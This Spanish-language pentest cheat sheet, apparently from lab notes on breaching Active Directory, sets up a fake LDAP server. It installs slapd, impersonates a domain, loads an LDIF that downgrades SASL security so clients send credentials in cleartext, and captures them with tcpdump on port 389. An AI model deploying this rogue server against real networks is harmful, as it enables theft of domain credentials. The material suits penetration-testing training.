Rogue servers
Fake LDAP
sudo apt-get update && sudo apt-get -y install slapd ldap-utils && sudo systemctl enable slapdsudo dpkg-reconfigure -p low slapdConfigurar el nombre de dominio que se desee "suplantar".
Crear el fichero que luego se usará para cargar la configuración en el servicio LDAP:
vim olcSaslSecProps.ldif Establecer una configuración insegura para la captura de credenciales usando la siguiente config:
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcredCargar la configuración en el servicio y reiniciarlo para que haga efecto:
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo systemctl restart slapdComprobar configuración:
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanismsCapturar paquetes con tcpdump:
sudo tcpdump -SX -i breachad tcp port 389Última actualización